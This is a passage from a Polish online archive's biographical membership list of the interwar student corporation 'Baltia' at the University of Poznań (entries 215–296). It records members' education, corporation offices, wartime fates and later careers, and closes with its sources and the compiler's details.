 215. Alfons Sergot, (6 sierpnia 1904 w Bydgoszczy - 10 lipca 1983 w Wiedniu) z bogatej rodziny chłopskiej, s. Leona i Walerii z Dembickich, uczeń progimnazjum w Lubawie, członek i przewodniczący Towarzystwa Tomasza Zana w Lubawie 1918-20, absolwent Gimnazjum w Toruniu 1922, student i absolwent 1926/27 prawa UP, prezes sem. zim. 1930/31, wiceprezes AKP 1925, po studiach sędzia w Ostrowie Wlkp., Gdyni i Wejherowie, a następnie adwokat w Chojnicach i Grudziądzu, działacz narodowy, prezes Okręgowego Wydziału Młodych SN na Pomorzu 1934, uczestnik wojny obronnej 1939, w czasie II wojny światowej więzień niemieckiego oflagu w Woldenbergu, po wojnie czynny w konspiracji antykomunistycznej ps. “Kawka”, prezes zarządu gdańskiego tajnego SN na Pomorzu, od 1949 na emigracji w Wielkiej Brytanii, pracownik rozgłośni Wolna Europa, później w Stanach Zjednoczonych pracownik Biblioteki Kongresu w Waszyngtonie, od 1965 prof. prawa i dyrektor biblioteki szkoły prawa Katolickiego Uniwersytetu w Ponce (Puerto Rico), na emeryturze zamieszkał w Wiedniu, jego prochy złożono w grobie rodzinnym na parafialnym cmentarzu w Lubawie [zob. Jerzy Szews, Słownik biograficzny Ziemi Lubawskiej 1244-2000, Lubawa 2000, s. 178 i n.]

  Józef Sielski, 1928/29 r.

 216. Józef Sielski, student i absolwent 1932/33 prawa UP, c. 1925, sekretarz sem. let. 1926/27, prezes sem. zim. i sem. let. 1928/29, aplikant adwokacki w Grudziądzu 1939, adwokat

 217. Józef Siamianowski, “działacz Akademickiego Koła Pomorskiego, prezes Koła Prawników i Ekonomistów 1926/27,
  skreślony 1928″

 218. Wojciech Skarżyński, farmaceuta

  Bolesław Skrzypczak, 2008 r.

 219. Bolesław Skrzypczak, (29 października 1920 w Lesznie - ) absolwent Gimnazjum w Bydgoszczy, student i absolwent farmacji UP 1938-48, c. 1939, dr farmacji 1951, pracownik przemysłu spirytusowego, prezes Stowarzyszenia Filistrów Poznańskich Korporacji Akademickich 1997-2007, reaktywator Baltii 2002, Filister honorowy Magna-Polonii 2004, Honorowy Członek Stowarzyszenia Filistrów (Poznańskich) Korporacji Akademickich 2008

  Bernard Sławiński, 1936 r.

 220. Bernard Sławiński, (1906-1993) od 1928 student farmacji UP, c. 1929

 221. Edward Sławiński, (1910-1963/4) c. 1927, skreślony 1931, działacz Akademickiego Koła Pomorskiego
 222. Paweł Słodowy,

  Marian Smoczkiewicz, 1928/29 r.

 223. Marian Smoczkiewicz, (1908 w Mogilnie - listopad 1939 w Bydgoszczy) s. Władysława i Czesławy z d. Filipowska, brat Stanisława (Baltia), absolwent Gimnazjum im. Jana Kasprowicza w Inowrocławiu, student i absolwent prawa UP, c. 1926, wiceprezes sem. zim. i sem. let. 1928/29, wiceprezes 1929/30 i prezes 1930/31 PKM (”Smok PKM-u”), redaktor publikacji “Od morza… Powszechnej Wystawie Krajowej zeszyt ten poświęca “Baltia” Korporacja Studentów Uniwersytetu Poznańskiego.”, członek Zarządu Akademickiego Kongresu Eucharystycznego 1930, wiceprezes Poznańskiego Komitetu Akademickiego 1930/31, aplikant sądowy, asesor sądowy m.in. w Sądzie Grodzkim w Inowrocławiu, adwokat w Bydgoszczy, działacz katolickim i społeczny, zamordowany przez Gestapo, miejsce pochówku nieznane

 224. Stanisław Smoczkiewicz, (19 listopada 1913 w Mogilnie - 7 lipca 1942 w Poznaniu) s. Władysława i Czesławy z d. Filipowska, brat Mariana (Baltia), absolwent Gimnazjum im. Jana Kasprowicza w Inowrocławiu 1924-31, student i absolwent 1934/35 prawa UP, wiceprezes r.a. 1933/34, przewodniczący Wydziału Pomorskich Korporacji Akademickich w Poznaniu, po studiach do wybuchu aplikant w Zakładzie Ubezpieczeń Społecznych w Poznaniu, podczas okupacji członek ścisłego kierownictwa organizacji konspiracyjnej “Ojczyzna”, zastępca dyrektora Biura Delegatury Rządu dla ziem wcielonych do Rzeszy 1940, aresztowany w listopadzie 1941, przeszedł ciężkie śledztwo w siedzibie Gestapo i Forcie VII, gdzie 7 lipca 1942 r. ślad po nim zaginął
 225. Alfred Sobański, c. 1929
 226. Marian Sobecki, student prawa UP, c. 1925, olderman sem. zim. 1930/31, podczas okupacji kierownik Okręgowej Delegatury Rządu obwodu Tczew
 227. Teodor Sowiński, (1909 - ) student i absolwent 1932/33 prawa UP, c. 1927, od 1946 adwokat w Nowej Soli
 228. Jan Stachurski, c. 1926, skreślony 1927
 229. Reinhold Staniszewski,
 230. Feliks Starzyński, student i absolwent 1934/35 prawa UP, działacz Akademickiego Koła Pomorskiego
 231. Ignacy Stawicki, c. 1925, skreślony 1927
 232. Alfons Stefaniak, c. 1928, skreślony 1931

  Kazimierz Stojałowski, 1926/27 r.

 233. Kazimierz Stojałowski, (1 października 1903 w Toruniu - 22 grudnia 1995 w Poznaniu) filomata pomorski w Toruniu, student i absolwent 1927/28 med. UP, dr med. UP 1928, członek Baltii, sekretarz sem. let. 1925/26, wiceprezes sem. zim. 1926/27, w 1939 w komitecie red. II cz. Rocznika Korporacyjnego, sekretarz 1931-32 oraz wiceprezes 1936-39 Koła Filistrów, w 1939 na prośbę Masovii wygłosił serię wykładów na temat polskości Prus Wschodnich, Filister honorowy Masovii, asystent w sanatorium w Kowanówku 1928-30, asystent i adiunkt w Zakładzie Patologii Anatomicznej UP 1930-39, uczestnik wojny obronnej 1939, m.in. w obronie Warszawy, w 1939 wysiedlony z Poznania do Generalnej Guberni do Gorlic, gdzie pracował w Radzie Głównej Opiekuńczej, po wojnie adiunkt w Zakładzie Medycyny Sądowej UP, a następnie prof. i kierownik Katedry i Zakładu Anatomii Patologicznej PAM w Szczecinie, dr honoris causa PAM, autor ponad 200 prac naukowych

 234. Stefan Stypa, 31 lipca 1899 w Biechowie k. Wrześni - 17 października 1931) s. Wincentego i Heleny z d. Kalk, student i absolwent 1926/27 filologii germańskiej UP, wiceprezes sem. zim. 1925/26, olderman 1925/26, prezes PKM sem. zim. 1925/26 (po Szaynie), dr filozofii UP, prof. gimnazjum w Poznaniu, nauczyciel Wojewódzkiego Zakładu dla Głuchoniemych w Poznaniu, oficer rezerwy WP, ożenił się z Jadwigą Tomikowską 1931, pochowany na Cmentarzu Górczyńskim w Poznaniu [Źródła (poza wskazanymi poniżej spisu członków): nekrologi z Kuriera Poznańskiego]
 235. Antoni Szayna, c. 1929, doc. dr inż., autor prac z zakresu nauk politechnicznych
 236. Stanisław Szayna, (1898 w Drohobyczu - 14 maja 1929) uczeń gimnazjów w Drohobyczu i Lwowie, w czasie I wojny światowej ppor. armii austriackiej, oficer WP 1918-21, m.in. obrońca Lwowa, uczestnik wojny polsko-rosyjskiej, student i absolwent 1928/29 ekonomii UP, c. 1922, wiceprezes sem. zim. 1923/24, prezes sem. let. 1923/24 i 1924/25 (?) oraz sem. let. 1927/28, autor statutu Baltii, przyczynił się do zawarcia trójkartelu Baltia-Wisła-Aquilonia 1927, prezes sem. zim. 1925/26 oraz wiceprezes sem. let. 1926/27 (od maja) PKM, współautor statutu ZPKA, odznaczony Dyplomem Zasługi i Złotą Odznaką ZPKA, jeden z założycieli Młodzieży Wszechpolskiej w Poznaniu, członek Rady Naczelnej MW, członek Komitetu Głównego Młodych OWP, wydawca “Akademika”, pochowany na Cmentarzu Łyczakowskim w grobowcu Riedlów
 237. Stefan (Szczepan) Szczepanowski, student i absolwent 1925/26 ekonomii UP, członek Zarządu Akademickiego Koła Pomorskiego 1923, działacz konspiracji, po aresztowaniu zamęczony na śmierć przez Gestapo
 238. Tadeusz Szkudlarek, (1908 - ) c. 1927, ekonomista, nauczyciel
 239. Andrzej Szulc,
 240. Czesław Szulc, ( - 20 stycznia 1933) ochotnik w wojnie 1920, olderman sem. zim. i sem. let. 1928/29, wiceprezes Koła Filistrów, prawnik, aplikant sądowy
 241. Jerzy Szulc, (1915 - ) c. 1935, prezes Akademickiego Koła Pomorskiego 1937/38, lekarz
 242. Tomasz Szutenberg, ( - 1999) student Wydziału Prawno-Ekonomicznego UP, c. 1936, sekretarz 1937 oraz prezes 1938 AKP, więzień niemieckiego oflagu w Woldenbergu
 243. Zygmunt Szwedowski, student i absolwent prawa UP, założyciel Baltii, wiceprezes Bratniej Pomocy Studentów UP i członek Zarządu Narodowego Związku Młodzieży Akademickiej 1921/22, organizator Młodzieży Wszechpolskiej w Poznaniu, przewodniczący Komisji Rewizyjnej 1922 i przewodniczący Sądu Koleżeńskiego 1922/23, red. odpow. “”Akademika”", sędzia powiatowy w Kościerzynie, po wojnie w Gdyni
 244. Jan Szyszczyński, student i absolwent 1933/34 prawa UP, c. 1933, jeden z przywódców Ruchu Młodych OWP w Poznaniu, prezes Młodzieży Wszechpolskiej 1931-33, wydawca i redaktor czasopisma “Czuwamy” 1933-1936, po 1934 członek władz naczelnych Związku Młodych Narodowców
 245. Adam Śmieszny, ( - 1939-45) c. 1927, sekretarz sem. zim. 1929/30, prezes sem. zim. 1930/31 (po Antonim Sergocie), działacz Akademickiego Koła Pomorskiego, więzień obozu koncentracyjnego, gdzie został zamordowany
 246. Stanisław Świecki,
 247. Józef Talaśka, (27 stycznia 1916 w Lubikach pow. Starogard Gdański - 18 października 1985 w Gdyni) s. Franciszka i Amalii, absolwent Gimnazjum w Wejherowie 1934, student i absolwent med. UP 1934-39 oraz 1946, w czasie wojny lekarz-asystent w Gdyni, Jeleniej Górze, Hainbergu k. Codlitz w Niemczech, członek konspiracyjnej organizacji “Gryf Pomorski”, po wojnie m.in. lekarz w Szpitalu Miejskim w Gdyni oraz lekarz okrętowy, internista, elektrokardiograf, reumatolog, szykanowany przez władze komunistyczne, pochowany na Cmentarzu Witomińskim w Gdyni
 248. Paweł Tandeck, (1911 - 23 stycznia 1999 w Łobżenicy) student i absolwent prawa UP, c. 1930, skarbnik sem. let. 1936/37, prezes Akademickiego Koła Pomorskiego 1938/39 i 1939, radca prawny
 249. Karol Thomas, c. 1925, prezes sem. let. 1931/32, inż. leśnik
 250. Kazimierz Tobolski, c. 1933 (?)
 251. Jan Tobolski,
 252. Jan Trzciński, c. 1929, kierownik OWP, następnie Stronnictwa Narodowego w Golubiu
 253. Jerzy Tucholski,
 254. Zdzisław Twardowski, c. ok. 1930 Baltia, później założyciel Iustitii, pierwszy sekretarz sem. let. 1931/32, prezes sem. zim. i sem. let. 1937/38
 255. Jerzy Vesperman, działacz AKP, c. 1925, skreślony 1927

  Erwin Vetter, ok. 1924 r.

 256. Erwin Jan Vetter, (19 maja 1905 w Wielkim Leżnie pow. Brodnica - 1984) s. Wincentego i Amalli z d. Czerwińskiej, student filozofii, następnie student i absolwent med. UP 1924-35, c. 1925, działacz Akademickiego Koła Pomorskiego, w 1956 lekarz pediatra w Iławie

 257. Franciszek Walkowiak,
 258. Kazimierz Walkowiak, c. 1935
 259. Przemysław Warmiński, (14 marca 1908 w Bydgoszczy - 26 września 1939 w Warszawie) s. Emila Józefa oraz Haliny z Młynarzów, student i absolwent prawa, działacz narodowy, prezes Młodzieży Wszechpolskiej 1930/31, przywódca ONR w Poznaniu, wieloletni zawodnik AZS Poznań, zdobywca dwóch tytułów mistrza Polski w tenisie (1930 w deblu, 1932 w mikście), czterokrotny reprezentant kraju w Pucharze Davisa 1928-32, jako zawodnik AZS uczestnik ligowych rozgrywkach hokejowych, m.in. zdobywając mistrzostwo Polski w 1934, od 1938 trener reprezentacji narodowej w hokeju, pracował jako dziennikarz m.in. w “Głosie Akademickim”, “ABC - Nowiny Codzienne”, “Kurierze Warszawskim” oraz katowickiej “Polonii”, ppor. rez., poległ w wojnie obronnej 1939 w obronie Warszawy, odznaczony Krzyżem Walecznych
 260. Wacław Wawrzyniak,
 261. Roman Weber, c. 1929
 262. Franciszek Wegner, (3 kwietnia 1899 w Kamieniu Pomorskim [obecnie Kamień Krajeński] - 11 maja 1946 w Gdynii) s. Eugena (adwokata, burmistrza Kamienia Pomorskiego) i Ireny z Rutkowskich, żołnierz armii pruskiej, a następnie Błękitnej Armii gen. Józefa Hallera, student i absolwent 1925/26 prawa UP, pierwszy skarbnik 1921/22, delegat Polski na Światowy Zjazd Federacji Studentów Chrześcijańskich w Czechosłowacji 1922, członek Zarządu Bratniej Pomocy Studentów UP, aplikant sądowy w Tucholi 1928, następnie asesor, a później adwokat, delegat Rady Adwokackiej w Gdyni, walczył w obronie Gdynii 1939, ranny w walkach, na przełomie 1939/40 zorganizował grupę konspiracyjną “Młode Wici”, później członek “Gryfa Pomorskiego”, komendant na rejon Gdynia, Gdańsk i Tczew, aresztowany przez Gestapo, osadzony w obozie koncentracyjnym w Stutthofie 1943-45, pochowany na Cmentarzu na Witominie w Gdynii

  Brunon Wejznerowski, lata 50-te (?).

 263. Brunon Wejznerowski, (19 czerwca 1899 w Gąsiorkach pow. Tczew - 1 sierpnia 1973 w Gdańsku) s. Karola i Marianny Jendrzejewskiej, absolwent Państwoego Gimnazjum Klasycznego w Starogardzie Gdańskim, filomata pomorski w Starogardzie Gdańskim, student i absolwent 1934 farmacji UP, działacz Akademickiego Koła Pomorskiego, po studiach pracownik apteki J. Cieszyńskiego “Pod Łabędziem” w Starogardzie Gdańskim, a następnie Zakładów Farmaceutycznych “Polpharma” w Starogardzie, we wrześniu 1939 aresztowany przez Gestapo i osadzony w w obozie Grenzdorf k. Gdańska, skąd w październiku 1939 udało mu się zbiec do Generalnej Guberni, w czasie okupacji pracował w aptece, a następnie w hurtowni aptecznej w Warszawie, po upadku powstania warszawskiego wywieziony na roboty przymusowe do Bartold k. Wrocławia, po wojnie dzierżawił aptekę “Pod Łabędziem” w Gniewie, a po jej upaństwowieniu kierownik apteki do 1967 oraz jej pracownik do 1970, członek PPS, a od 1948 PZPR, członek i wieleletni przewodniczący Rady Miejskiej w Gniewie, radny Miejskiej Rady Narodowej w Gniewie, prezes Koła ZBoWiD, pochowany na cmentarzu parafialnym w Gniewie

  Gerard Wierzba, 1936 r.

 264. Gerard Wierzba, sekretarz sem. zim. 1936/37 oraz sem. zim. 1937/38, wiceprezes sem. zim. 1938/39

 265. Tadeusz Wierzbicki,
 266. Brunon Wiśniewski, c. 1929
 267. Witold Witkowski, c. 1935

  Alojzy Witt, czas studiów.

 268. Alojzy Witt, (2 października 1904 w Elblągu - 29 kwietnia 1989 w Poznaniu) s. Michała i Melanii z d. Muszyńska, absolwent Gimnazjum im. M. Kopernika w Toruniu 1922, student i absolwent ekonomii UP 1923-30, działacz Akademickiego Koła Pomorskiego, równolegle ze studiami pracował w Krajowym Ubezpieczeniu Ogniowym (późniejszy Zakład Ubezpieczeń Wzajemnych) w Poznaniu 1923-35 z przerwą na służbę wojskową w Szkole Podchorążych 1929-30, ppor. rez. piechoty, zastępca dyrektora Oddziału Zakładu Ubezpieczeń Wzajemnych w Bydgoszczy 1935, zastępca dyrektora Oddziału Zakładu Ubezpieczeń Wzajemnych w Gdyni 1936-37, dyrektor Oddziału Zakładu Ubezpieczeń Wzajemnych w Lesznie 1938, dyrektor Oddziału Zakładu Ubezpieczeń Wzajemnych w Gdyni 1939, uczestnik wojny obronnej 1939 w Gdyni, jej okolicach i na Kępie Oksywskiej jako dowódca plutonu w stopniu podporucznika piechoty w 2. Morskim Pułku Strzelców w Gdyni, więzień niemieckich obozów jenieckich (oflagów) w Prenzlau, Neubrandenburg, Gross Born i Sandbostel, po ukończeniu działań wojennych - obóz aliancki w Verden 1945, od sierpnia 1945 kierownik kancelarii i oficer łącznikowy z CCG (Control Commission for Germany) w komendzie obozu dla polskiej ludności cywilnej w Westerstede, od 1946 pracował w Polskiej Misji Repatriacyjnej na Strefę Brytyjską, w latach 1947-48 w Wydziale Konsularnym Polskiej Misji Wojskowej w Berlinie, po powrocie do kraju ponownie praca w ubezpieczeniach: w Państwowym Zakładzie Ubezpieczeń w Poznaniu - od lipca 1948 do sierpnia 1960 na kilku kolejnych stanowiskach kierowniczych, a od września 1960 do przejścia na emeryturę w grudniu 1970 - w Wydziale Kontroli jako starszy inspektor kontroli, pochowany w grobie rodzinnym na Cmentarzu Junikowskim w Poznaniu

 269. Edmund Wohlfeil, działacz Akademickiego Koła Pomorskiego
 270. Aleksander Wojciechowski,

  Alfons Wojciechowski, pierwsza poł. lat 30-tych.

 271. Alfons Wojciechowski, (1906 - maj 1994) s. Józefa i Katarzyny z d. Kuczkowskiej, brat Józefa (Baltia), student i absolwent 1932/33 prawa UP, c. 1925, sekretarz sem. let. 1927/28, sędzia, radca prawny, współautor “Od morza jesteśmy od morza - Historia Baltii Korporacji Studentów Uniwersytetu Poznańskiego 1921-1939″ (Poznań b.r.w.)

  Józef Wojciechowski, pierwsza poł. lat 30-tych.

 272. Józef Mikołaj Wojciechowski, (6 grudnia 1910 w Pucku - 23 lutego 2000 w Poznaniu) s. Józefa i Katarzyny z d. Kuczkowskiej, brat Alfonsa (Baltia), uczeń i absolwent Państwowego Gimnazjum Matematyczno-Przyrodniczego w Grudziądzu 1922-30, student 1930-36 i absolwent 1939 med. UP, c. 1931, sekretarz sem. let. 1934/35, od 1936 pracował m.in. w Zakładzie Anatomii Patologicznej UP oraz w Szpitalu im. Przemienienia Pańskiego w Poznaniu, w czasie okupacji wysiedlony do tzw. Generalnej Guberni, gdzie osiadł w Radomiu, na przełomie 1941/42 więzień obozu koncentracyjnego w Auschwitz, w 1945 przeniósł się do Inowrocławia, ordynator oddziału ginkologiczno-położniczego 1945-62, a w latach 1949-53 dyrektor Szpitala Miejskiego w Inowrocławiu, działacz SD, radny województwa bydgoskiego, w 1962 przeniósł się do Poznania, gdzie pracował do emerytury w lecznictwie otwartym, współautor “Od morza jesteśmy od morza - Historia Baltii Korporacji Studentów Uniwersytetu Poznańskiego 1921-1939″ (Poznań b.r.w.), pochowany na cmentarzu Junikowskim w Poznaniu

 273. Alfons (Antoni) Wojewski, ( - 1992) absolwent med. UP 1939, skarbnik sem. let. 1935/36, sekretarz sem. let. 1936/37, por. rez., w okresie wojny członek organizacji konspiracyjnych “Pomoc Polakom”, “Polska Żyje” i “Tajnej Organizacji Wojskowej Gryf”, szef służby sanitarnej Wydziału Sanitarnego Komendy Naczelnej TOW Gryf 1942-43, aresztowany i osadzony w obozie Stutthofie, lekarz obozowy, po wojnie dyrektor szpitala w Pucku, jeden z twórców Pomorskiej Akademii Medycznej w Szczecinie, prof. i kierownik Kliniki Urologii Pomorskiej, prorektor 1968-74, prezes Polskiego Towarzystwa Urologicznego, autor 129 publikacji naukowych
 274. Merard Wojnowski, (1908-1990) działacz Akademickiego Koła Pomorskiego
 275. Witold Wojnowski,
 276. Wacław Woźniewski, c. 1927, wiceprezes sem. let. 1929/30, działacz Akademickiego Koła Pomorskiego
 277. Kazimierz Woźny, (18 stycznia 1895 w Środzie Wlkp. - 1940 w Katyniu) s. Jana, student i absolwent (dr med.) 1926/27 med. UP, lekarz w Rogoźnie Wlkp., por. rez., w wojnie obronnej 1939 Komendant Szpitala Polowego nr 202
 278. Herbert Wruck, c. 1925, skreślony 1927
 279. Bogdan Wrzyszczyński, (1 listopada 1901 w Łopiszewie k. Ryczywołu w pow. obornickim - 11 września 1968 w Poznaniu) s. Kazimierza i Marii z d. Rontz, brat Stanisława (Baltia), uczestnik powstania wielkpolskiego 1918-19, absolwent Gimnazjum im. K. Marcinkowskiego w Poznaniu, student med. UP, członek Baltii, student i absolwent AMW 1924-28, a następnie asystent AMW, członek Lutyko-Venedyi, dyrektor Rzeźni Miejskiej i Eksportowej w Toruniu 1930-39, por. rez., uczestnik wojny obronnej 1939, więzień obozu jenieckiego VII A w Murnau 1939-45, po wojnie pracownik UNRA w Niemczech 1945-47, w 1947 wrócił do kraju, dr wet. Wydział Medycyny Weterynaryjnej we Wrocławiu 1949, dyrektor Przedsiębiorstwa Zaopatrzenia Weterynaryjno-Zootechnicznego “Centrowet” w Poznaniu, odznaczony Srebrnym Krzyżem Zasługi oraz Krzyżem Powstańców Wielkopolskich, pochowany na Cmentarzu Junikowskim w Poznaniu (grób R-1-A-98)
 280. Stanisław Wrzyszczyński, (5 maja 1899 w w Łopiszewie k. Ryczywołu w pow. obornickim - 5 marca 1968 w Columbus w Ohio) s. Kazimierza i Marii z d. Rontz, brat Bogdana (Lutyko-Venedya, Baltia), student prawa UP, adwokat w Wągrowcu, działacz Akademickiego Koła Pomorskiego, prezes Koła Filistrów 1929-32, oficer rez., walczył w wojnie obronnej 1939, więzień obozu jenieckiego VII A w Murnau 1939-45, po wojnie na emigracji w Stanach Zjednoczonych, pracował m.in. w firmie ubezpieczeniowej
 281. Roman Wygocki, student i absolwent 1932/33 prawa UP, c. 1926, aplikant adwokacki w Grudziądzu w 1939, więzień niemieckiego oflagu w Woldenbergu
 282. Edmund Wykrzykowski,
 283. Stanisław Wyrzykowski (Wykrzykowski ?), c. 1929, kierownik Komisji Propagandy i Prasy w Zarządzie Młodzieży Wszechpolskiej 1931/32
 284. Jan Zalewski, c. 1927, działacz Akademickiego Koła Pomorskiego, aplikant adwokacki w Gdyni w 1939
 285. Kazimierz Zalewski, student i absolwent 1932/33 prawa UP, c. 1926, sekretarz sem. let. 1929/30, wiceprezes sem. zim. 1930/31, działacz Akademickiego Koła Pomorskiego
 286. Jerzy Zawadzki, c. 1935, skreślony 1936, wiceprezes Koła Farmaceutów 1935
 287. Hugo Paweł Zawodziński, student i absolwent 1929/30 prawa UP, c. 1927, sekretarz Akademickiego Koła Pomorskiego 1927/28, sędzia grodzki
 288. Stanisław Zbierski, c. 1927, wystąpił 1928
 289. Bolesław Zieliński, brat Borysa (Baltia), filomata pomorski w Świeciu; student i absolwent 1927/28 ekonomii UP, członek Zarządu Młodzieży Wszechpolskiej 1923, działacz Akademickiego Koła Pomorskiego
 290. Borys Zieliński, brat Bolesława (Baltia), filomata pomorski w Świeciu, student med. UP, skreślony z Chrobrii 1925, c. 1925 Baltia, skreślony z Baltii 1925, działacz Akademickiego Koła Pomorskiego
 291. Łucjan Zientarski (Ziętarski), c. 1933 (?)
 292. Wacław Ziętak, student i absolwent prawa UP, założyciel Baltii, obywatel ziemski w Zapluskowęsach pow. Wąbrzeźno
 293. Lech Złotowicz, (3 listopada 1912 w Czerniejewie - 5 grudnia 2006 w Poznaniu) absolwent Gimnazjum w Krotoszynie 1931, student i absolwent prawa UP 1931-36, c. 1935, pchor. rez., po studiach pracował od 1937 w Aptece pod Białym Orłem w Poznaniu, od 1938 w Aptece Centralnej w Bydgoszczy, w wojnie obronnej 1939 zmobilizowany do Kadry Zapasowej drugiego Szpitala Okręgowego w Lublinie, w czasie okupacji pracownik Apteki Sapieżyńskiej w Poznaniu 1939-45, w 1945 organizator apteki pod Złotym Lwem w Poznaniu, właściciel apteki w Środzie Wlkp. 1947-51, po upaństwowieniu aptek kierownik aptek w Środzie Wlkp. i Poznaniu, działacz farmaceutyczny, m.in. sekretarz Izby Aptekarskiej w Poznaniu i członek Zarządu Związku Zawodowego Pracowników Służby Zdrowie (sekcja aptekarska), odznaczony Medalem im. Ignacego Łukasiewicza, reaktywator Baltii 2002, pochowany na Cmentarzu Junikowskim w Poznaniu
 294. Zbigniew Żarnowski, c. 1926, członek OWP i SN, kierownik grupy akademickiej Ruchu Młodych OWP 1931/32, po wojnie członek Rady Narodowej SN na emigracji

  Paweł Żelazny, prawd. lata 30-te.

 295. Paweł Żelazny, (27 grudnia 1902 w Chełmży - 20 września 1941 w Warszawie) s. Pawła (nauczyciela i muzyka, rektora katolickiej szkoły chłopięcej w Chełmży) i Józefiny z d. Kowalewska, absolwent Miejskiego Gimnazjum Realnego w Sopocie 1919, student i absolwent pierwszego rocznika prawa UP 1919-1923, ochotnik w wojnie bolszewickiej 1920 w szeregach 203 pułku piechoty Armii Ochotniczej gen. Józefa Hallera, uczestnik bitew Warszawskiej, pod Komarowem, nad Niemnem, ukończył aplikację sędziowską w Sądzie Apelacyjnym w Toruniu zakończoną egzaminem sędziowskim 1923-26, asesor sądowy w Chojnicach i Czersku, gdzie w styczniu 1927 otrzymał nominację na sędziego powiatowego, od 1928 sędzia powiatowy, a od końca 1928 sędzia okręgowy w Grudziądzu, od 1931 adwokat w Grudziądzu, w 1939 z żoną wysiedlony do Generalnego Gubernatorstwa, osiadł w Warszawie, prawdopodobnie od wiosny 1940 sędzia w polskim Sądzie Grodzkim przy ul. Leszno w Warszawie, ożeniony z Heleną z Michalskich 1927, nie miał dzieci, ale z żoną na wychowanie wzięli jej siostrzenicę Irenę Kochowicz, odznaczony Medalem 10-lecia Odzyskania Niepodległości 1929, zmarł w czasie wojny prawdopodobnie na tyfus, pochowany na Powązkach (kw. 137, rz. 2, g. 6) [Źródła (poza wskazanymi poniżej spisu członków): relacji siostrzenicy Anny Raczyńskiej oraz biogramu opracowanego przez Annę Dembińską-Południak]

 296. Jerzy Władysław Kazimierz Żuralski, (8 czerwca 1905 w Lidzbarku Warmińskim - druga poł. lat 60-tych) s. Zbigniewa i Franciszki z d. Laska, ppor. rez. aeronautyki, w wojnie obronnej 1939 dowódca plutonu w 5 kompanii balonów zaporowych, m.in. uczestnik w obronie Warszawy, przez Węgry przedostał się do PSZ we Francji, ewakuowany do Wielkiej Brytanii, służył w lotnictwie, awansowany do stopnia kpt., w 1945 z tajną misją kurierską do Polski, aresztowany przez UB 1945, skazany na karę śmierci za szpiegostwo 1947 (zamieniona na dożywocie), zwolniony na mocy amnestii w 1956, zamieszkał w Jarocinie, a później w Warszawie, nauczyciel niemieckiego i angielskiego, pracownik “Lingwisty”

Pieczęć Baltii, 1939 r.

Listę członków opracowano na podstawie:

1) Sprawozdania roczne z działalności Korporacji Studentów Uniwersytetu Poznańskiego „Baltia, Poznań 1926-1936,
2) Historia Baltii – Korporacji Studentów Uniwersytetu Poznańskiego 1921 - 1939, Poznań b.r.w.,
3) Daniel Pater, Lista członków Polskiej Akademickiej Korporacji Baltia (Poznań), (w:) Polskie Korporacje Akademickie 1997, nr 14, s. 70 i n.,
4) Maciej Konarski, Wykaz imienny członków Korporacji Baltia, www.baltia.bloog.pl, stan 4 XI 2010 r.,
5) materiałów archiwalnych z Archiwum Korporacyjnego,
6) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Baltia.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 12 IX 2007 r.
Ostatnia zmiana: 3 I 2022 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Korporacja Studentów Uniwersytetu Poznańskiego „Baltia”, (na:) www.archiwumkorporacyjne.pl, stan 3 I 2022 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }